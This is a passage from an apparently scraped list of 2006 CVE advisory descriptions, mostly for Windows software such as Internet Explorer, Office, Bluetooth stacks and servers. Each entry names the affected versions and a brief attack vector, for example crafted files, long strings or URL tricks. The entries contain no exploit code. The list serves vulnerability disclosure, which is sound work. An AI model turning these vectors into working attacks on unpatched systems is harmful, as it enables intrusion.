on Windows, Widcomm Bluetooth Communication Software 1.4.1.03 on Windows, and the Bluetooth implementation in Windows Mobile or Windows CE on the HP IPAQ 2215 and 5450, allows remote attackers to cause a denial of service (service crash) and possibly execute arbitrary code via unspecified vectors. [CVE-2006-6898] Widcomm Bluetooth for Windows (BTW) before 4.0.1.1500 allows remote attackers to listen to and record conversations, aka the CarWhisperer attack. [CVE-2006-6897] Directory traversal vulnerability in Widcomm Bluetooth for Windows (BTW) 3.0.1.905 allows remote attackers to conduct unauthorized file operations via a .. (dot dot) in an unspecified parameter. [CVE-2006-6853] Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted packet to TCP port 4002. [CVE-2006-6714] Multiple memory leaks in Hitachi Directory Server 2 P-2444-A124 before 02-11-/K on Windows, and P-1B44-A121 before 02-10-/V on HP-UX, allow remote attackers to cause a denial of service (memory consumption) via invalid LDAP requests. [CVE-2006-6713] Buffer overflow in Hitachi Directory Server 2 P-2444-A124 before 02-11-/K on Windows, and P-1B44-A121 before 02-10-/V on HP-UX, allows remote attackers to execute arbitrary code via crafted LDAP requests. [CVE-2006-6617] projectserver/logon/pdsrequest.asp in Microsoft Project Server 2003 allows remote authenticated users to obtain the MSProjectUser password for a SQL database via a GetInitializationData request, which includes the information in the UserName and Password tags of the response. [CVE-2006-6578] Microsoft Internet Information Services (IIS) 5.1 permits the IUSR_Machine account to execute non-EXE files such as .COM files, which allows attackers to execute arbitrary commands via arguments to any .COM file that executes those arguments, as demonstrated using win.com when it is in a web directory with certain permissions. [CVE-2006-6561] Unspecified vulnerability in Microsoft Word 2000, 2002, and Word Viewer 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted DOC file that triggers memory corruption, as demonstrated via the 12122006-djtest.doc file, a different issue than CVE-2006-5994 and CVE-2006-6456. [CVE-2006-6500] Heap-based buffer overflow in Mozilla Firefox 2.x before 2.0.0.1, 1.5.x before 1.5.0.9, Thunderbird before 1.5.0.9, and SeaMonkey before 1.0.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by setting the CSS cursor to certain images that cause an incorrect size calculation when converting to a Windows bitmap. [CVE-2006-6458] The Trend Micro scan engine before 8.320 for Windows and before 8.150 on HP-UX and AIX, as used in Trend Micro PC Cillin - Internet Security 2006, Office Scan 7.3, and Server Protect 5.58, allows remote attackers to cause a denial of service (CPU consumption and system hang) via a malformed RAR archive with an Archive Header section with the head_size and pack_size fields set to zero, which triggers an infinite loop. [CVE-2006-6456] Unspecified vulnerability in Microsoft Word 2000, 2002, and 2003 and Word Viewer 2003 allows remote attackers to execute code via unspecified vectors related to malformed data structures that trigger memory corruption, a different vulnerability than CVE-2006-5994. [CVE-2006-6443] Buffer overflow in the Novell Distributed Print Services (NDPS) Print Provider for Windows component (NDPPNT.DLL) in Novell Client 4.91 has unknown impact and remote attack vectors. [CVE-2006-6427] The Web User Interface in Xerox WorkCentre and WorkCentre Pro before 12.060.17.000, 13.x before 13.060.17.000, and 14.x before 14.060.17.000 allows remote attackers to execute arbitrary commands via unspecified vectors involving "command injection" in (1) the TCP/IP hostname, (2) Scan-to-mailbox folder names, and (3) certain parameters in the Microsoft Networking configuration. NOTE: vector 1 might be the same as CVE-2006-5290. [CVE-2006-6334] Heap-based buffer overflow in the SendChannelData function in wfica.ocx in Citrix Presentation Server Client before 9.230 for Windows allows remote malicious web sites to execute arbitrary code via a DataSize parameter that is less than the length of the Data buffer. [CVE-2006-6311] Microsoft Internet Explorer 6.0.2900.2180 allows remote attackers to cause a denial of service via a style attribute in an HTML table tag with a width value that is dynamically calculated using JavaScript. [CVE-2006-6310] Microsoft Internet Explorer 6.0 SP1 and earlier allows remote attackers to cause a denial of service (crash) via an invalid src attribute value ("?") in an HTML frame tag that is in a frameset tag with a large rows attribute. NOTE: The provenance of this information is unknown [CVE-2006-6308] * DISPUTED Symantec LiveState 7.1 Agent for Windows allows local users to gain privileges by stopping the shstart.exe process and open "Web Self-Service" from the system tray icon, which will open a browser window running with elevated privileges. NOTE: several third-party researchers have noted that administrator privileges may be necessary to terminate shstart.exe. If this is the case, then no privilege escalation occurs, and this is not a vulnerability. [CVE-2006-6307] srvloc.sys in Novell Client for Windows before 4.91 SP3 allows remote attackers to cause an unspecified denial of service via a crafted packet to port 427 that triggers an access of pageable or invalid addresses using a higher interrupt request level (IRQL) than necessary. [CVE-2006-6133] Stack-based buffer overflow in Visual Studio Crystal Reports for Microsoft Visual Studio .NET 2002 and 2002 SP1, .NET 2003 and 2003 SP1, and 2005 and 2005 SP1 (formerly Business Objects Crystal Reports XI Professional) allows user-assisted remote attackers to execute arbitrary code via a crafted RPT file. [CVE-2006-6120] Integer overflow in the KPresenter import filter for Microsoft PowerPoint files (filters/olefilters/lib/klaola.cc) in KOffice before 1.6.1 allows user-assisted remote attackers to execute arbitrary code via a crafted PPT file, which results in a heap-based buffer overflow. [CVE-2006-5994] Unspecified vulnerability in Microsoft Word 2000 and 2002, Office Word and Word Viewer 2003, Word 2004 and 2004 v. X for Mac, and Works 2004, 2005, and 2006 allows remote attackers to execute arbitrary code via a Word document with a malformed string that triggers memory corruption, a different vulnerability than CVE-2006-6456. [CVE-2006-5988] Unspecified vulnerability in Windows 2000 Advanced Server SP4 running Active Directory allows remote attackers to cause a denial of service via unknown vectors, as demonstrated by a certain VulnDisco Pack module. NOTE: the provenance of this information is unknown [CVE-2006-5961] Buffer overflow in Mercury Mail Transport System 4.01b for Windows has unknown impact and attack vectors, as originally reported in a GLEG VulnDisco pack. NOTE: the provenance of this information is unknown [CVE-2006-5913] Microsoft Internet Explorer 7 allows remote attackers to (1) cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/sslnavcancel.htm with the target site in the anchor identifier, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid, or (2) trigger a "The webpage no longer exists" report via a link to res://ieframe.dll/http_410.htm, a variant of CVE-2006-5805. [CVE-2006-5884] Multiple unspecified vulnerabilities in DirectAnimation ActiveX controls for Microsoft Internet Explorer 5.01 through 6 have unknown impact and remote attack vectors, possibly related to (1) Danim.dll and (2) Lmrt.dll, a different set of vulnerabilities than CVE-2006-4446 and CVE-2006-4777. [CVE-2006-5858] Adobe ColdFusion MX 7 through 7.0.2, and JRun 4, when run on Microsoft IIS, allows remote attackers to read arbitrary files, list directories, or read source code via a double URL-encoded NULL byte in a ColdFusion filename, such as a CFM file. [CVE-2006-5850] Stack-based buffer overflow in Essentia Web Server 2.15 for Windows allows remote attackers to execute arbitrary code via a long URI, as demonstrated by a GET or HEAD request. NOTE: some of these details are obtained from third party information. [CVE-2006-5805] Microsoft Internet Explorer 7 allows remote attackers to cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/invalidcert.htm with the target site as an argument, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid. [CVE-2006-5581] Unspecified vulnerability in Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code via certain DHTML script functions, such as normalize, and "incorrectly created elements" that trigger memory corruption, aka "DHTML Script Function Memory Corruption Vulnerability." [CVE-2006-5579] Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code by using JavaScript to cause certain errors simultaneously, which results in the access of previously freed memory, aka "Script Error Handling Memory Corruption Vulnerability." [CVE-2006-5578] Microsoft Internet Explorer 6 and earlier allows remote attackers to read Temporary Internet Files (TIF) and obtain sensitive information via unspecified vectors involving certain drag and drop operations, aka "TIF Folder Information Disclosure Vulnerability," and a different issue than CVE-2006-5577. [CVE-2006-5577] Microsoft Internet Explorer 6 and earlier allows remote attackers to obtain sensitive information via unspecified uses of the OBJECT HTML tag, which discloses the absolute path of the corresponding TIF folder, aka "TIF Folder Information Disclosure Vulnerability," and a different issue than CVE-2006-5578. [CVE-2006-5574] Unspecified vulnerability in the Brazilian Portuguese Grammar Checker in Microsoft Office 2003 and the Multilingual Interface for Office 2003, Project 2003, and Visio 2003 allows user-assisted remote attackers to execute arbitrary code via crafted text that is not properly parsed. [CVE-2006-5559] The Execute method in the ADODB.Connection 2.7 and 2.8 ActiveX control objects (ADODB.Connection.2.7 and ADODB.Connection.2.8) in the Microsoft Data Access Components (MDAC) 2.5 SP3, 2.7 SP1, 2.8, and 2.8 SP1 does not properly track freed memory when the second argument is a BSTR, which allows remote attackers to cause a denial of service (Internet Explorer crash) and possibly execute arbitrary code via certain strings in the second and third arguments. [CVE-2006-5544] Visual truncation vulnerability in Microsoft Internet Explorer 7 allows remote attackers to spoof the address bar and possibly conduct phishing attacks via a malicious URL containing non-breaking spaces (%A0), which causes the address bar to omit some characters from the URL. [CVE-2006-5395] Buffer overflow in Microsoft Class Package Export Tool (aka clspack.exe) allows context-dependent attackers to execute arbitrary code via a long string. NOTE: the provenance of this information is unknown [CVE-2006-5330] CRLF injection vulnerability in Adobe Flash Player plugin 9.0.16 and earlier for Windows, 7.0.63 and earlier for Linux, 7.x before 7.0 r67 for Solaris, and before 9.0.28.0 for Mac OS X, allows remote attackers to modify HTTP headers of client requests and conduct HTTP Request Splitting attacks via CRLF sequences in arguments to the ActionScript functions (1) XML.addRequestHeader and (2) XML.contentType. NOTE: the flexibility of the attack varies depending on the type of web browser being used. [CVE-2006-5296] PowerPoint in Microsoft Office 2003 does not properly handle a container object whose position value exceeds the record length, which allows user-assisted attackers to cause a denial of service (NULL dereference and application crash) via a crafted PowerPoint (.PPT) file, as demonstrated by Nanika.ppt, and a different vulnerability than CVE-2006-3435, CVE-2006-3876, CVE-2006-3877, and CVE-2006-4694. NOTE: the impact of this issue was originally claimed to be arbitrary code execution, but later analysis demonstrated that this was erroneous. [CVE-2006-5266] Multiple buffer overflows in Microsoft Dynamics GP (formerly Great Plains) 9.0 and earlier allow remote attackers to execute arbitrary code via (1) a crafted Distributed Process Manager (DPM) message to the (a) DPM component, or a (2) long string or (3) long IP address in a Distributed Process Server (DPS) message to the DPM or (b) DPS component. [CVE-2006-5265] Unspecified vulnerability in Microsoft Dynamics GP (formerly Great Plains) 9.0 and earlier allows remote attackers to cause a denial of service (crash) via an invalid magic number in a Distributed Process Server (DPS) message. [CVE-2006-5162] wininet.dll in Microsoft Internet Explorer 6.0 SP2 and earlier allows remote attackers to cause a denial of service (unhandled exception and crash) via a long Content-Type header, which triggers a stack overflow. [CVE-2006-5152] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL that is returned in a large HTTP 404 error message without an explicit charset, a related issue to CVE-2006-0032. [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname. [CVE-2006-4981] Symantec Sygate NAC allows physically proximate attackers to bypass control methods and join a local network by selecting a forged MAC address associated with an exception rule that (1) permits all non-Windows devices or (2) whitelists certain sets of Organizationally Unique Identifiers (OUIs). [CVE-2006-4899] The ePPIServlet script in Computer Associates (CA) eTrust Security Command Center 1.0 and r8 up to SP1 CR2, when running on Windows, allows remote attackers to obtain the web server path via a "'" (single quote) in the PIProfile function, which leaks the path in an error message. [CVE-2006-4888] Microsoft Internet Explorer 6 and earlier allows remote attackers to cause a denial of service (application hang) via a CSS-formatted HTML INPUT element within a DIV element that has a larger size than the INPUT. [CVE-2006-4854] REJECT Unspecified vulnerability in Microsoft Office 2000 (Chinese Edition) and Microsoft PowerPoint 2000 (Chinese Edition) allows user-assisted attackers to execute arbitrary code via a crafted PPT document, as exploited by malware such as Trojan.PPDropper.E. NOTE: on 20060919, Microsoft notified CVE that this is a duplicate of CVE-2006-0009. [CVE-2006-4777] Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese and possibly other Windows distributions, allows remote attackers to execute arbitrary code via unknown manipulations in arguments to the KeyFrame method, possibly related to an integer overflow, as demonstrated by daxctle2, and a different vulnerability than CVE-2006-4446. [CVE-2006-4732] Unspecified vulnerability in Microsoft Visual Basic (VB) 6 has an unknown impact ("overflow") via a project that contains a certain Click event procedure, as demonstrated using the msgbox function and the VB.Label object. [CVE-2006-4704] Cross-zone scripting vulnerability in the WMI Object Broker (WMIScriptUtils.WMIObjectBroker2) ActiveX control (WmiScriptUtils.dll) in Microsoft Visual Studio 2005 allows remote attackers to bypass Internet zone restrictions and execute arbitrary code by instantiating dangerous objects, aka "WMI Object Broker Vulnerability." [CVE-2006-4697] Microsoft Internet Explorer 5.01, 6, and 7 uses certain COM objects from Imjpcksid.dll as ActiveX controls, which allows remote attackers to execute arbitrary code via unspecified vectors. NOTE: this issue might be related to CVE-2006-4193. [CVE-2006-4695] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via a crafted URL, aka "Office Web Components URL Parsing Vulnerability." [CVE-2006-4693] Unspecified vulnerability in Microsoft Word 2004 for Mac and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string in a Word file, a different issue than CVE-2006-3647 and CVE-2006-3651. [CVE-2006-4687] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via crafted layout combinations involving DIV tags and HTML CSS float properties that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2006-4686] Buffer overflow in the Extensible Stylesheet Language Transformations (XSLT) processing in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 allows remote attackers to execute arbitrary code via a crafted Web page. [CVE-2006-4685] The XMLHTTP ActiveX control in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 does not properly handle HTTP server-side redirects, which allows remote user-assisted attackers to access content from other domains. [CVE-2006-4627] System Information ActiveX control (msinfo.dll), when accessed via Microsoft Internet Explorer, allows remote attackers to cause a denial of service (crash) via a SaveFile function with a long (1) computer and possibly (2) filename and (3) category argument. [CVE-2006-4614] PDAapps Verichat for Pocket PC 1.30bh stores usernames and passwords in plaintext in the Windows Mobile registry, which allows local users to obtain sensitive information via keys under \HKEY_CURRENT_USER\Software\PDAapps\VeriChat. [CVE-2006-4613] Multiple unspecified vulnerabilities in SnapGear before 3.1.4u1 allow remote attackers to cause a denial of service via unspecified vectors involving (1) IPSec replay windows and (2) the use of vulnerable versions of ClamAV before 0.88.4. NOTE: it is possible that vector 2 is related to CVE-2006-4018. [CVE-2006-4560] Internet Explorer 6 on Windows XP SP2 allows remote attackers to execute arbitrary JavaScript in the context of the browser's session with an arbitrary intranet web server, by hosting script on an Internet web server that can be made inaccessible by the attacker and that has a domain name under the attacker's control, which can force the browser to drop DNS pinning and perform a new DNS query for the domain name after the script is already running. [CVE-2006-4534] Unspecified vulnerability in Microsoft Word 2000, 2002, and Office 2003 allows remote user-assisted attackers to execute arbitrary code via unspecified vectors involving a crafted file resulting in a malformed stack, as exploited by malware with names including Trojan.Mdropper.Q, Mofei, and Femo. [CVE-2006-4513] Multiple integer overflows in the WV library in wvWare (formerly mswordview) before 1.2.3, as used by AbiWord, KWord, and possibly other products, allow user-assisted remote attackers to execute arbitrary code via a crafted Microsoft Word (DOC) file that produces (1) large LFO clfolvl values in the wvGetLFO_records function or (2) a large LFO nolfo value in the wvGetFLO_PLF function. [CVE-2006-4494] Microsoft Visual Studio 6.0 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Visual Studio 6.0 ActiveX COM Objects in Internet Explorer, including (1) tcprops.dll, (2) fp30wec.dll, (3) mdt2db.dll, (4) mdt2qd.dll, and (5) vi30aut.dll. [CVE-2006-4492] Unspecified vulnerability in Cybozu Office 6.5 Build 1.2 for Windows allows remote attackers to obtain sensitive information, including users and groups, via unspecified vectors. [CVE-2006-4465] DISPUTED Microsoft Terminal Server, when running an application session with the "Start program at logon" and "Override settings from user profile and Client Connection Manager wizard" options, allows local users to execute arbitrary code by forcing an Explorer error. NOTE: a third-party researcher has stated that the options are "a convenience to users" and were not intended to restrict execution of arbitrary code. [CVE-2006-4446] Heap-based buffer overflow in DirectAnimation.PathControl COM object (daxctle.ocx) in Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a Spline function call whose first argument specifies a large number of points. [CVE-2006-4444] Multiple SQL injection vulnerabilities in Cybozu Garoon 2.1.0 for Windows allow remote authenticated users to execute arbitrary SQL commands via the (1) tid parameter in the (a) todo/view (aka TODO List View), (b) todo/modify (aka TODO List Modify), or (c) todo/delete functionality [CVE-2006-4359] Stack-based buffer overflow in Trident Software PowerZip 7.06 Build 3895 on Windows 2000 allows remote attackers to execute arbitrary code via a ZIP archive containing a long filename. [CVE-2006-4332] Unspecified vulnerability in the DHCP dissector in Wireshark (formerly Ethereal) 0.10.13 through 0.99.2, when run on Windows, allows remote attackers to cause a denial of service (crash) via unspecified vectors that trigger a bug in Glib. [CVE-2006-4315] Unquoted Windows search path vulnerability in multiple SSH Tectia products, including Client/Server/Connector 5.0.0 and 5.0.1 and Client/Server before 4.4.5, and Manager 2.12 and earlier, when running on Windows, might allow local users to gain privileges via a malicious program file under "Program Files" or its subdirectories. [CVE-2006-4309] VNC server on the AK-Systems Windows Terminal 1.2.5 ExVLP is not password protected, which allows remote attackers to login and view RDP or Citrix sessions. [CVE-2006-4301] Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service (crash) via a long Color attribute in multiple DirectX Media Image DirectX Transforms ActiveX COM Objects from (a) dxtmsft.dll and (b) dxtmsft3.dll, including (1) DXImageTransform.Microsoft.MaskFilter.1, (2) DXImageTransform.Microsoft.Chroma.1, and (3) DX3DTransform.Microsoft.Shapes.1. [CVE-2006-4274] REJECT Unknown vulnerability in Microsoft PowerPoint allows user-assisted attackers to execute arbitrary code via a crafted PPT document, as exploited by malware such as TROJ_MDROPPER.BH. NOTE: on 20060822, it was determined that TROJ_MDROPPER.BH was exploiting CVE-2006-0009, so this is not a new vulnerability. [CVE-2006-4273] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin 3.5.4 and 3.6.0 allows remote attackers to inject arbitrary web script or HTML by uploading an attachment with a .pdf extension that contains JavaScript, which is processed as script by Microsoft Internet Explorer 6. [CVE-2006-4258] Absolute path traversal vulnerability in the get functionality in Anti-Spam SMTP Proxy (ASSP) allows remote authenticated users to read arbitrary files via (1) C:\ (Windows drive letter), (2) UNC, and possibly other types of paths in the file parameter. [CVE-2006-4193] Microsoft Internet Explorer 6.0 SP1 and possibly other versions allows remote attackers to cause a denial of service and possibly execute arbitrary code by instantiating COM objects as ActiveX controls, including (1) imskdic.dll (Microsoft IME), (2) chtskdic.dll (Microsoft IME), and (3) msoe.dll (Outlook), which leads to memory corruption. NOTE: it is not certain whether the issue is in Internet Explorer or the individual DLL files. [CVE-2006-4183] Heap-based buffer overflow in Microsoft DirectX SDK (February 2006) and probably earlier, including 9.0c End User Runtimes, allows context-dependent attackers to execute arbitrary code via a crafted Targa file with a run-length-encoding (RLE) compression that produces more data than expected when decoding. [CVE-2006-4128] Multiple heap-based buffer overflows in Symantec VERITAS Backup Exec for Netware Server Remote Agent for Windows Server 9.1 and 9.2 (all builds), Backup Exec Continuous Protection Server Remote Agent for Windows Server 10.1 (builds 10.1.325.6301, 10.1.326.1401, 10.1.326.2501, 10.1.326.3301, and 10.1.327.401), and Backup Exec for Windows Server and Remote Agent 9.1 (build 9.1.4691), 10.0 (builds 10.0.5484 and 10.0.5520), and 10.1 (build 10.1.5629) allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted RPC message. [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems. [CVE-2006-4098] Stack-based buffer overflow in the CSRadius service in Cisco Secure Access Control Server (ACS) for Windows before 4.1 and ACS Solution Engine before 4.1 allows remote attackers to execute arbitrary code via a crafted RADIUS Accounting-Request packet. [CVE-2006-4097] Multiple unspecified vulnerabilities in the CSRadius service in Cisco Secure Access Control Server (ACS) for Windows before 4.1 and ACS Solution Engine before 4.1 allow remote attackers to cause a denial of service (crash) via a crafted RADIUS Access-Request packet. NOTE: it has been reported that at least one issue is a heap-based buffer overflow involving the Tunnel-Password attribute. [CVE-2006-4046] Multiple stack-based buffer overflows in Open Cubic Player 2.6.0pre6 and earlier for Windows, and 0.1.10_rc5 and earlier on Linux/BSD, allow remote attackers to execute arbitrary code via (1) a large .S3M file handled by the mpLoadS3M function, (2) a crafted .IT file handled by the itplayerclass::module::load function, (3) a crafted .ULT file handled by the mpLoadULT function, or (4) a crafted .AMS file handled by the mpLoadAMS function. [CVE-2006-3945] The CSS functionality in Opera 9 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by setting the background property of a DHTML element to a long http or https URL, which triggers memory corruption. [CVE-2006-3910] Internet Explorer 6 on Windows XP SP2, when Outlook is installed, allows remote attackers to cause a denial of service (crash) by calling the NewDefaultItem function of an OVCtl (OVCtl.OVCtl.1) ActiveX object, which triggers a null dereference. [CVE-2006-3877] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office 2002, Office 2003, Office 2004 for Mac, and Office v.X for Mac allows user-assisted attackers to execute arbitrary code via an unspecified "crafted file," a different vulnerability than CVE-2006-3435, CVE-2006-4694, and CVE-2006-3876. [CVE-2006-3876] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office 2002, Office 2003, Office 2004 for Mac, and Office v.X for Mac allows user-assisted attackers to execute arbitrary code via a crafted Data record in a PPT file, a different vulnerability than CVE-2006-3435 and CVE-2006-4694. [CVE-2006-3875] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, and Excel Viewer 2003 allows user-assisted attackers to execute arbitrary code via a crafted COLINFO record in an XLS file, a different vulnerability than CVE-2006-2387 and CVE-2006-3867. [CVE-2006-3868] Unspecified vulnerability in Microsoft Office XP and 2003 allows remote user-assisted attackers to execute arbitrary code via a malformed Smart Tag. [CVE-2006-3867] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, and Excel Viewer 2003 allows user-assisted attackers to execute arbitrary code via a crafted Lotus 1-2-3 file, a different vulnerability than CVE-2006-2387 and CVE-2006-3875. [CVE-2006-3864] Unspecified vulnerability in mso.dll in Microsoft Office 2000, XP, and 2003, and Microsoft PowerPoint 2000, XP, and 2003, allows remote user-assisted attackers to execute arbitrary code via a malformed record in a (1) .DOC, (2) .PPT, or (3) .XLS file that triggers memory corruption, related to an "array boundary condition" (possibly an array index overflow), a different vulnerability than CVE-2006-3434, CVE-2006-3650, and CVE-2006-3868. [CVE-2006-3854] Buffer overflow in IBM Informix Dynamic Server (IDS) 9.40.TC7, 9.40.TC8, 10.00.TC4, and 10.00.TC5, when running on Windows, allows remote attackers to execute arbitrary code via a long username, which causes an overflow in vsprintf when displaying in the resulting error message. NOTE: this issue is due to an incomplete fix for CVE-2006-3853. [CVE-2006-3853] Buffer overflow in IBM Informix Dynamic Server (IDS) before 9.40.TC7 and 10.00 before 10.00.TC3, when running on Windows, allows remote attackers to execute arbitrary code via a long username. [CVE-2006-3841] Cross-site scripting (XSS) vulnerability in WebScarab before 20060718-1904, when used with Microsoft Internet Explorer 6 SP2 or Konqueror 3.5.3, allows remote attackers to inject arbitrary web script or HTML via the URL, which is not sanitized before being returned in an error message when WebScarab is not able to access the URL. [CVE-2006-3779] Citrix MetaFrame up to XP 1.0 Feature 1, except when running on Windows Server 2003, installs a registry key with an insecure ACL, which allows remote authenticated users to gain privileges. [CVE-2006-3729] DataSourceControl in Internet Explorer 6 on Windows XP SP2 with Office installed allows remote attackers to cause a denial of service (crash) via a large negative integer argument to the getDataMemberName method of a OWC11.DataSourceControl.11 object, which leads to an integer overflow and a null dereference. [CVE-2006-3697] Agnitum Outpost Firewall Pro 3.51.759.6511 (462), as used in (1) Lavasoft Personal Firewall 1.0.543.5722 (433) and (2) Novell BorderManager Novell Client Firewall 2.0, does not properly restrict user activities in application windows that run in a LocalSystem context, which allows local users to gain privileges and execute commands (a) via the "open folder" option when no instance of explorer.exe is running, possibly related to the ShellExecute API function [CVE-2006-3675] Password Safe 2.11, 2.16 and 3.0BETA1 does not respect the configuration settings for locking the password database when certain dialogue windows are open, which might allow attackers with physical access to obtain the database contents. [CVE-2006-3660] Unspecified vulnerability in Microsoft PowerPoint 2003 has unknown impact and user-assisted attack vectors related to powerpnt.exe. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3655, CVE-2006-3656, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3659] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the location or URL property of a MHTMLFile ActiveX object. [CVE-2006-3658] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by accessing the object references of a FolderItem ActiveX object, which triggers a null dereference in the security check. [CVE-2006-3657] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (stack overflow exception) via a DXImageTransform.Microsoft.Gradient ActiveX object with a long (1) StartColorStr or (2) EndColorStr property. [CVE-2006-3656] Unspecified vulnerability in Microsoft PowerPoint 2003 allows user-assisted attackers to cause memory corruption via a crafted PowerPoint file, which triggers the corruption when the file is closed. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3655, CVE-2006-3660, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3655] Unspecified vulnerability in mso.dll in Microsoft PowerPoint 2003 allows user-assisted attackers to execute arbitrary code via a crafted PowerPoint file. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3656, CVE-2006-3660, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3654] Buffer overflow in wksss.exe 8.4.702.0 in Microsoft Works Spreadsheet 8.0 allows remote attackers to cause a denial of service (CPU consumption or crash) via crafted Excel files. [CVE-2006-3653] wksss.exe 8.4.702.0 in Microsoft Works Spreadsheet 8.0 allows remote attackers to cause a denial of service (CPU consumption or crash) via crafted (1) Works, (2) Excel, and (3) Lotus 1-2-3 files. [CVE-2006-3652] Microsoft Internet Security and Acceleration (ISA) Server 2004 allows remote attackers to bypass file extension filters via a request with a trailing "#" character. NOTE: as of 20060715, this could not be reproduced by third parties. [CVE-2006-3651] Unspecified vulnerability in Microsoft Word 2000, 2002, and Office 2003 allows remote user-assisted attackers to execute arbitrary code via a crafted mail merge file, a different vulnerability than CVE-2006-3647 and CVE-2006-4693. [CVE-2006-3650] Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac do not properly parse the length of a chart record, which allows remote user-assisted attackers to execute arbitrary code via a Word document with an embedded malformed chart record that triggers an overwrite of pointer values with values from the document, a different vulnerability than CVE-2006-3434, CVE-2006-3864, and CVE-2006-3868. [CVE-2006-3649] Buffer overflow in Microsoft Visual Basic for Applications (VBA) SDK 6.0 through 6.4, as used by Microsoft Office 2000 SP3, Office XP SP3, Project 2000 SR1, Project 2002 SP1, Access 2000 Runtime SP3, Visio 2002 SP2, and Works Suite 2004 through 2006, allows user-assisted attackers to execute arbitrary code via unspecified document properties that are not verified when VBA is invoked to open documents. [CVE-2006-3647] Integer overflow in Microsoft Word 2000, 2002, 2003, 2004 for Mac, and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string in a Word document, which overflows a 16-bit integer length value, aka "Memmove Code Execution," a different vulnerability than CVE-2006-3651 and CVE-2006-4693. [CVE-2006-3640] Microsoft Internet Explorer 5.01 and 6 allows certain script to persist across navigations between pages, which allows remote attackers to obtain the window location of visited web pages in other domains or zones, aka "Window Location Information Disclosure Vulnerability." [CVE-2006-3639] Microsoft Internet Explorer 5.01 and 6 does not properly identify the originating domain zone when handling redirects, which allows remote attackers to read cross-domain web pages and possibly execute code via unspecified vectors involving a crafted web page, aka "Source Element Cross-Domain Vulnerability." [CVE-2006-3638] Microsoft Internet Explorer 5.01 and 6 does not properly handle uninitialized COM objects, which allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code, as demonstrated by the Nth function in the DirectAnimation.DATuple ActiveX control, aka "COM Object Instantiation Memory Corruption Vulnerability." [CVE-2006-3637] Microsoft Internet Explorer 5.01 SP4 and 6 does not properly handle various HTML layout component combinations, which allows user-assisted remote attackers to execute arbitrary code via a crafted HTML file that leads to memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2006-3605] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Transition property on an uninitialized DXImageTransform.Microsoft.RevealTrans.1 ActiveX Object, which triggers a null dereference. [CVE-2006-3601] UNVERIFIABLE Unspecified vulnerability in an unspecified DNN Modules module for DotNetNuke (.net nuke) allows remote attackers to gain privileges via unspecified vectors, as used in an attack against the Microsoft France web site. NOTE: due to the lack of details and uncertainty about which product is affected, this claim is not independently verifiable. [CVE-2006-3591] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (application crash) by accessing the URL property of a TriEditDocument.TriEditDocument object before it has been initialized, which triggers a NULL pointer dereference. [CVE-2006-3590] mso.dll, as used by Microsoft PowerPoint 2000 through 2003, allows user-assisted attackers to execute arbitrary commands via a malformed shape container in a PPT file that leads to memory corruption, as exploited by Trojan.PPDropper.B, a different issue than CVE-2006-1540 and CVE-2006-3493. [CVE-2006-3545] DISPUTED ** Microsoft Internet Explorer 7.0 Beta allows remote attackers to cause a denial of service (application crash) via a web page with multiple empty APPLET start tags. NOTE: a third party has disputed this issue, stating that the crash does not occur with Microsoft Internet Explorer 7.0 Beta3. [CVE-2006-3513] 